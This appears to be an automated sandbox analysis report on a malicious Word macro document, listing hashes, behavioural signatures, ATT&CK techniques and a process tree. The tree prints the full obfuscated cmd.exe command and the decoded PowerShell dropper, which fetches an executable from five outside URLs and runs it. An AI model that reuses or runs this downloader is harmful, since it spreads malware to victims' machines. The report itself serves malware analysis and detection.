4c10ebf2339186ba1432a006b9062f41992017fb2578820fd08d29c5bdc9f8a6

General

Target

fcd0876b1f82c246ff0d07f7e6a4e37d_JaffaCakes118.doc
Size

84KB
MD5

fcd0876b1f82c246ff0d07f7e6a4e37d
SHA1

4b44a9eb9c4d69bc19e6f931c6aaf1504acba02f
SHA256

4c10ebf2339186ba1432a006b9062f41992017fb2578820fd08d29c5bdc9f8a6
SHA512

e43412b817bdd4662cfe592ea656d1fa1b9feb67f54c0964185dc7699f87cc435c049838ea5934f9fb33e789eea9469c965016b0e7cb69ebb9ea72f849564056
SSDEEP

768:ZCVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBx+1oadzX5k2i4gz+OFs2QDj:ZCocn1kp59gxBK85fBx+aa9i4bl

Score

10^/10

discovery execution

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	2400	2536	cmd.exe	30

Blocklisted process makes network request 4 IoCs

flow	pid	Process
5	2596	powershell.exe
11	2596	powershell.exe
12	2596	powershell.exe
14	2596	powershell.exe

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

pid	Process
2400	cmd.exe
2776	cmd.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

pid	Process
2596	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2536	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2596	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2596	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2536	WINWORD.EXE
2536	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2536 wrote to memory of 1636	2536	WINWORD.EXE	31
PID 2536 wrote to memory of 1636	2536	WINWORD.EXE	31
PID 2536 wrote to memory of 1636	2536	WINWORD.EXE	31
PID 2536 wrote to memory of 1636	2536	WINWORD.EXE	31
PID 2536 wrote to memory of 2400	2536	WINWORD.EXE	32
PID 2536 wrote to memory of 2400	2536	WINWORD.EXE	32
PID 2536 wrote to memory of 2400	2536	WINWORD.EXE	32
PID 2536 wrote to memory of 2400	2536	WINWORD.EXE	32
PID 2400 wrote to memory of 2776	2400	cmd.exe	35
PID 2400 wrote to memory of 2776	2400	cmd.exe	35
PID 2400 wrote to memory of 2776	2400	cmd.exe	35
PID 2400 wrote to memory of 2776	2400	cmd.exe	35
PID 2776 wrote to memory of 2596	2776	cmd.exe	36
PID 2776 wrote to memory of 2596	2776	cmd.exe	36
PID 2776 wrote to memory of 2596	2776	cmd.exe	36
PID 2776 wrote to memory of 2596	2776	cmd.exe	36

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fcd0876b1f82c246ff0d07f7e6a4e37d_JaffaCakes118.doc"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2536
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1636
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c C:\Windows\system32\cmd.exe, ,;;;/V;,;,;/C",,,(,;,;,;,;,;,(,(,(,,,,,(s^e^t ^D4= ^ ^ ^ ^ ^}^}^{^hctac^}}^ka^erb;CrT^$^ ^ss^ec^orP-^tratS^;^)CrT^$^(^e^l^ifo^teva^s^.^Qw^I^$;^)^ydo^Be^sno^ps^er^.v^wq$^(etirw.Qw^I$^;1^ = ^e^pyt.Q^w^I$;^)^(ne^po^.^Q^w^I$^{ ^)^0^0^2^ qe^-^ ^su^t^a^tS^.vwq$^( ^f^I;^)^(^dn^e^s.vw^q$;^)0^,^F^GM^$^,'^TE^G'^(ne^po^.vw^q^$^{yr^t^{^)^Q^WN$ n^i FG^M$^(^hc^aer^o^f;^'^maer^t^s.^bdo^d^a' ^m^oc-^ tc^e^jb^O^-weN = QwI^$;^'pt^th^lmx^.^2lmx^sm'^ ^m^oc-^ ^tce^jb^O-^weN=^ vwq$^;^)'^ex^e.^h^XC\^'+^)^(^h^ta^P^pm^eT^t^e^G:^:]^hta^P.^OI^.me^tsy^S[^(=CrT$^;^)^'@'^(tilp^S^.^'4CD3^0A^XN/ten^.^wbb^go^lb//^:p^t^th^@Uy^Q^QV0S^O^j^b/ln^.^snoit^aerc^e^l^bi^s^ivn^i.^w^en//^:p^t^th^@A^JUO^ivx1h^Y/moc^.^dn^ali^a^h^tal^ov//^:pt^t^h^@kk^X^S^jz^8V/m^oc.m^ih^a^fla^a^s^s^i^e//^:^ptt^h^@^PI^T^Okv8/moc.n^owno^i^l^.^w^ww//^:^pt^th^'^=^Q^WN$;'C^j^z'=^jna$^ ^l^le^hsr^ewo^p);););;;;;;;;;;;);,;,;)&&;,,;;^f^or,/^L;,,,%^4,,^in;,(55^4;-^1^;^0^;;;^;);d^o,;;,(,;,;,(,;,;,;,(,(;^s^et ^iJ=!^iJ!!^D4:~%^4,1!);,;);;;;;);)&&;;^i^f;,%^4;; ,,,l^e^q,;;,,^0;;,,(,(,,,(,;,;,;,;,;,(c^a^ll;,%^iJ:^*i^J!^=%),),),,,,,)"
  2⤵
  - Process spawned unexpected child process
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe , ,;;;/V;,;,;/C",,,(,;,;,;,;,;,(,(,(,,,,,(s^e^t ^D4= ^ ^ ^ ^ ^}^}^{^hctac^}}^ka^erb;CrT^$^ ^ss^ec^orP-^tratS^;^)CrT^$^(^e^l^ifo^teva^s^.^Qw^I^$;^)^ydo^Be^sno^ps^er^.v^wq$^(etirw.Qw^I$^;1^ = ^e^pyt.Q^w^I$;^)^(ne^po^.^Q^w^I$^{ ^)^0^0^2^ qe^-^ ^su^t^a^tS^.vwq$^( ^f^I;^)^(^dn^e^s.vw^q$;^)0^,^F^GM^$^,'^TE^G'^(ne^po^.vw^q^$^{yr^t^{^)^Q^WN$ n^i FG^M$^(^hc^aer^o^f;^'^maer^t^s.^bdo^d^a' ^m^oc-^ tc^e^jb^O^-weN = QwI^$;^'pt^th^lmx^.^2lmx^sm'^ ^m^oc-^ ^tce^jb^O-^weN=^ vwq$^;^)'^ex^e.^h^XC\^'+^)^(^h^ta^P^pm^eT^t^e^G:^:]^hta^P.^OI^.me^tsy^S[^(=CrT$^;^)^'@'^(tilp^S^.^'4CD3^0A^XN/ten^.^wbb^go^lb//^:p^t^th^@Uy^Q^QV0S^O^j^b/ln^.^snoit^aerc^e^l^bi^s^ivn^i.^w^en//^:p^t^th^@A^JUO^ivx1h^Y/moc^.^dn^ali^a^h^tal^ov//^:pt^t^h^@kk^X^S^jz^8V/m^oc.m^ih^a^fla^a^s^s^i^e//^:^ptt^h^@^PI^T^Okv8/moc.n^owno^i^l^.^w^ww//^:^pt^th^'^=^Q^WN$;'C^j^z'=^jna$^ ^l^le^hsr^ewo^p);););;;;;;;;;;;);,;,;)&&;,,;;^f^or,/^L;,,,%^4,,^in;,(55^4;-^1^;^0^;;;^;);d^o,;;,(,;,;,(,;,;,;,(,(;^s^et ^iJ=!^iJ!!^D4:~%^4,1!);,;);;;;;);)&&;;^i^f;,%^4;; ,,,l^e^q,;;,,^0;;,,(,(,,,(,;,;,;,;,;,(c^a^ll;,%^iJ:^*i^J!^=%),),),,,,,)"
    3⤵
    - An obfuscated cmd.exe command-line is typically used to evade detection.
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2776
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell $anj='zjC';$NWQ='http://www.lionwon.com/8vkOTIP@http://eissaalfahim.com/V8zjSXkk@http://volathailand.com/Yh1xviOUJA@http://new.invisiblecreations.nl/bjOS0VQQyU@http://blogbbw.net/NXA03DC4'.Split('@');$TrC=([System.IO.Path]::GetTempPath()+'\CXh.exe');$qwv =New-Object -com 'msxml2.xmlhttp';$IwQ = New-Object -com 'adodb.stream';foreach($MGF in $NWQ){try{$qwv.open('GET',$MGF,0);$qwv.send();If ($qwv.Status -eq 200) {$IwQ.open();$IwQ.type = 1;$IwQ.write($qwv.responseBody);$IwQ.savetofile($TrC);Start-Process $TrC;break}}catch{}}
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
19KB

MD5
ed4acbe7858f684e6e48ed6c6fae166b

SHA1
a33bdac5917bbea79fbdfe565c63f33bbc055ab2

SHA256
d7230fa57f3f83d027377449bbf60b73fda47c6ea2c81eb6ffc6154074798d3f

SHA512
43dd8e3d5cabfbea8d660e907e0fe19506de20c9cfd75f8aaffa57581ae49738244dab8eeba930f93105e91b743edecbbde0e3c1e684aa645816e2e431c65229

Download Submit
memory/2536-0-0x000000002F8A1000-0x000000002F8A2000-memory.dmp

Filesize
4KB

Download
memory/2536-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2536-2-0x000000007150D000-0x0000000071518000-memory.dmp

Filesize
44KB

Download
memory/2536-6-0x0000000006050000-0x0000000006150000-memory.dmp

Filesize
1024KB

Download
memory/2536-14-0x000000007150D000-0x0000000071518000-memory.dmp

Filesize
44KB

Download
memory/2536-15-0x0000000006050000-0x0000000006150000-memory.dmp

Filesize
1024KB

Download
memory/2536-44-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2536-45-0x000000007150D000-0x0000000071518000-memory.dmp

Filesize
44KB

Download

Analysis

Sharing